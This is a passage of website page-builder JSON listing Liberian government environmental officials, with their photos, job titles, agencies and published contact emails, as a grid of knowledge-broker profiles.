questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Daoda S. Carlon <\\/strong>\\n<p>Assistant Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA <\\/br>\\ncarlonbaindu@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental 